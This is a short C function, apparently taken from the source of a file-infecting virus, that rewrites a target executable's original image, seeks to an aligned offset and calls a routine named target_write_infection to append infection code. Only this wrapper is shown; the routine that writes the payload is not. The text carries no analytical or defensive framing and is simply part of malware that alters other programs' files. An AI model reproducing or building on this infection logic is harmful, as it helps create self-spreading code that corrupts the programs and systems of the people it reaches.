bool target_copy_and_infect(Target* t, size_t* code_size)
{
  TRACE_DEBUG(-1, "target_copy_and_infect\n");
  CHECK_WRITE(t->image.b, t->filesize); /* original target */
  CHECK_LSEEK(t->aligned_filesize, SEEK_SET);
  return target_write_infection(t, code_size);
}
